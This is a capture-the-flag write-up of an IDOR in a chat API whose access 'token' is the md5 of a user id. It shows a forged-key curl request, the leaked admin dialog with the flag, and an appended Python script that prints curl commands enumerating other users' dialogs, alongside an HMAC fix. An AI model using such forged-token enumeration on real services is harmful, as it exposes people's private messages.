Door Paradox [web]

Door Paradox

But let’s go back to the point of the competition. We wrote a messenger for you, because we want you to be comfortable talking. Account for you: test:test

Recon

Chat application. You log in as test:test and land in the account with user id 3.

There is an API endpoint /api/messages.getByDialog that takes two POST parameters: user_id, the id of the other party in the dialog, and key, a "token" that is nothing more than the md5 hash of the requesting user's own id. It returns the chat history between the two users.

For our test user (id: 3) this is:

echo -n "3" | md5sum
eccbc87e4b5ce2fe28308fd9f2a7baf3

Imitate admin

Because the key is derived only from the user id, we can impersonate the admin by sending key=md5("1") (c4ca4238a0b923820dcc509a6f75849b) and asking for the dialog with user_id=2:

curl 'http://sherlock-message.ru/api/messages.getByDialog' --data 'user_id=2&key=c4ca4238a0b923820dcc509a6f75849b'

The server accepts the forged key and returns the chat history between user_id=1 and user_id=2:

{
    "response": {
        "members": {
            "first": {
                "id": 1,
                "nickname": "Admin1"
            },
            "second": {
                "id": 2,
                "nickname": "Admin2"
            }
        },
        "messages": [
            {
                "from_member": "second",
                "message": "ewq"
            },
            {
                "from_member": "second",
                "message": "\u041d\u0443 \u0434\u0430\u0432\u0430\u0439 \u0442\u043e\u0433\u0434\u0430 FLAG{iD00r_with_insecure_token}"
            },
            {
                "from_member": "first",
                "message": "\u041d\u0435, \u043d\u0443 \u044f \u043d\u0435 \u0437\u043d\u0430\u044e.. \u0438\u043c \u0436\u0435 \u043d\u0430\u0434\u043e \u0432\u044b\u0438\u0433\u0440\u044b\u0432\u0430\u0442\u044c"
            }
        ]
    },
    "status": "success"
}

The Russian messages read "Well, come on then FLAG{iD00r_with_insecure_token}" and "Nah, I don't know.. they do need to win", so the dialog contains the flag. The bug is a classic IDOR: access to a dialog is decided by a client-supplied identity whose "token" anyone can compute.
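The forgery above, generalized into a small script, as an added example that is not part of the original writeup. It reproduces the challenge's key derivation (md5 of the decimal user id, confirmed by the hashes on this page) and builds the request bodies needed to read any dialog of any user; the endpoint URL is the one from the curl command. The issue_key/verify_key functions are an assumed hardened variant (HMAC with a server secret), added here to show why the original scheme is forgeable; they are not part of the challenge.

```python
import hashlib
import hmac
from urllib.parse import urlencode

# Endpoint taken from the writeup's curl command.
ENDPOINT = "http://sherlock-message.ru/api/messages.getByDialog"


def forge_key(user_id: int) -> str:
    """The challenge's 'token': md5 of the decimal user id. Any client can compute it."""
    return hashlib.md5(str(user_id).encode()).hexdigest()


def forge_request_body(caller_id: int, partner_id: int) -> str:
    """Body for getByDialog: `user_id` names the dialog partner, `key` claims who we are.

    forge_request_body(1, 2) reproduces the body used in the writeup.
    """
    return urlencode({"user_id": partner_id, "key": forge_key(caller_id)})


def enumerate_dialogs(caller_id: int, partner_ids) -> dict:
    """Request bodies to dump every dialog `caller_id` has with each candidate partner.

    Each body can be POSTed to ENDPOINT exactly like the curl command on this page.
    """
    return {pid: forge_request_body(caller_id, pid) for pid in partner_ids if pid != caller_id}


# --- Assumed hardened variant, not from the challenge --------------------------
# A token that is a keyed MAC over the user id cannot be derived by the client.
# (Even this is only a stopgap: the real fix is to take the caller's identity from
# the authenticated session and check server-side that the session user is a member
# of the requested dialog, instead of trusting any identity parameter at all.)

def issue_key(server_secret: bytes, user_id: int) -> str:
    """Server-side token issuance: HMAC-SHA256 over the user id with a secret key."""
    return hmac.new(server_secret, str(user_id).encode(), hashlib.sha256).hexdigest()


def verify_key(server_secret: bytes, user_id: int, key: str) -> bool:
    """Constant-time check of a presented token; a forged md5 'token' never passes."""
    return hmac.compare_digest(issue_key(server_secret, user_id), key)


if __name__ == "__main__":
    # Reproduce the writeup: admin (1) talking to user 2.
    print(forge_request_body(1, 2))
    # Dump the bodies for admin's dialogs with the first few user ids.
    for pid, body in enumerate_dialogs(1, range(2, 6)).items():
        print(f"curl '{ENDPOINT}' --data '{body}'")
```

Run it to print ready-to-use curl commands; the first line is exactly the body from the writeup. Against the hardened variant, forge_key(1) is rejected because the attacker lacks server_secret.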

Flag

FLAG{iD00r_with_insecure_token}